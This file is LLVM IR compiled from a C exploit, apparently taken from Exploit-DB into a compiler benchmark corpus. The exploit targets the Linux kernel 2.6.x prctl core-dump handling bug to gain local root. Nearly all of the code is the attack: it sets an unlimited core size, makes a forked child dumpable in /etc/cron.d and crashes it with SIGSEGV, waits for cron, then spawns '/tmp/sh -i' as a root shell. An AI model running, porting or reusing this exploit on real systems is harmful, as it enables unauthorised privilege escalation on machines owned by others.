; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_2004.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_2004.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.rlimit = type { i8*, i8* }

@.str = private unnamed_addr constant [58 x i8] c"Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\0A\00", align 1
@.str.1 = private unnamed_addr constant [24 x i8] c"By: dreyer & RoMaNSoFt\0A\00", align 1
@.str.2 = private unnamed_addr constant [18 x i8] c"[ 10.Jul.2006 ]\0A\0A\00", align 1
@RLIM_INFINITY = common dso_local global i8* null, align 8
@RLIMIT_CORE = common dso_local global i32 0, align 4
@.str.3 = private unnamed_addr constant [25 x i8] c"[*] Creating Cron entry\0A\00", align 1
@.str.4 = private unnamed_addr constant [12 x i8] c"/etc/cron.d\00", align 1
@PR_SET_DUMPABLE = common dso_local global i32 0, align 4
@SIGSEGV = common dso_local global i32 0, align 4
@.str.5 = private unnamed_addr constant [56 x i8] c"[*] Sleeping for aprox. one minute (** please wait **)\0A\00", align 1
@.str.6 = private unnamed_addr constant [66 x i8] c"[*] Running shell (remember to remove /tmp/sh when finished) ...\0A\00", align 1
@.str.7 = private unnamed_addr constant [11 x i8] c"/tmp/sh -i\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main() #0 {
  %1 = alloca i32, align 4
  %2 = alloca %struct.rlimit, align 8
  %3 = call i32 @printf(i8* getelementptr inbounds ([58 x i8], [58 x i8]* @.str, i64 0, i64 0))
  %4 = call i32 @printf(i8* getelementptr inbounds ([24 x i8], [24 x i8]* @.str.1, i64 0, i64 0))
  %5 = call i32 @printf(i8* getelementptr inbounds ([18 x i8], [18 x i8]* @.str.2, i64 0, i64 0))
  %6 = load i8*, i8** @RLIM_INFINITY, align 8
  %7 = getelementptr inbounds %struct.rlimit, %struct.rlimit* %2, i32 0, i32 1
  store i8* %6, i8** %7, align 8
  %8 = load i8*, i8** @RLIM_INFINITY, align 8
  %9 = getelementptr inbounds %struct.rlimit, %struct.rlimit* %2, i32 0, i32 0
  store i8* %8, i8** %9, align 8
  %10 = load i32, i32* @RLIMIT_CORE, align 4
  %11 = call i32 @setrlimit(i32 %10, %struct.rlimit* %2)
  %12 = call i32 @printf(i8* getelementptr inbounds ([25 x i8], [25 x i8]* @.str.3, i64 0, i64 0))
  %13 = call i32 (...) @fork()
  store i32 %13, i32* %1, align 4
  %14 = icmp ne i32 %13, 0
  br i1 %14, label %21, label %15

15:                                               ; preds = %0
  %16 = call i32 @chdir(i8* getelementptr inbounds ([12 x i8], [12 x i8]* @.str.4, i64 0, i64 0))
  %17 = load i32, i32* @PR_SET_DUMPABLE, align 4
  %18 = call i32 @prctl(i32 %17, i32 2)
  %19 = call i32 @sleep(i32 200)
  %20 = call i32 @exit(i32 1) #3
  unreachable

21:                                               ; preds = %0
  %22 = load i32, i32* %1, align 4
  %23 = load i32, i32* @SIGSEGV, align 4
  %24 = call i32 @kill(i32 %22, i32 %23)
  %25 = call i32 @printf(i8* getelementptr inbounds ([56 x i8], [56 x i8]* @.str.5, i64 0, i64 0))
  %26 = call i32 @sleep(i32 62)
  %27 = call i32 @printf(i8* getelementptr inbounds ([66 x i8], [66 x i8]* @.str.6, i64 0, i64 0))
  %28 = call i32 @system(i8* getelementptr inbounds ([11 x i8], [11 x i8]* @.str.7, i64 0, i64 0))
  ret i32 0
}

declare dso_local i32 @printf(i8*) #1

declare dso_local i32 @setrlimit(i32, %struct.rlimit*) #1

declare dso_local i32 @fork(...) #1

declare dso_local i32 @chdir(i8*) #1

declare dso_local i32 @prctl(i32, i32) #1

declare dso_local i32 @sleep(i32) #1

; Function Attrs: noreturn
declare dso_local i32 @exit(i32) #2

declare dso_local i32 @kill(i32, i32) #1

declare dso_local i32 @system(i8*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
